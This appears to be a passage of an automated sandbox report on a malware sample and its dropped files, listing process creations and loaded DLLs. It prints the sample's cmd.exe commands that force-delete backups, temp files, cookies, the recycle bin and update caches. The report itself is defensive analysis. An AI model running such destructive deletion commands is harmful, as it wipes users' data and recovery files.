                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exitJump to behavior
                Source: C:\Windows\SysWOW64\033726\svchost.exeProcess created: C:\Windows\SysWOW64\034031\svchost.exe "C:\Windows\system32\034031\svchost.exe"
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: acgenral.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: winmmbase.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: winmmbase.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: acgenral.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: winmmbase.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: winmmbase.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: acgenral.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: winmmbase.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: winmmbase.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: msvcp60.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: dlnashext.dllJump to behavior
                Source: C:\Windows\Temp\server.exeSection loaded: wpdshext.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: drprov.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: ntlanman.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: davclnt.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: davhlpr.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: hra33.dllJump to behavior
                Source: C:\Windows\Temp\v5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: acgenral.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: winmmbase.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: winmmbase.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: oledlg.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: ieproxy.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: msiso.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: profext.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\Temp\ .exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: avicap32.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: msvfw32.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: msvcp60.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: samcli.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: napinsp.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: pnrpnsp.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: wshbth.dll
                Source: C:\Windows\SysWOW64\033726\svchost.exeSection loaded: nlaapi.dll
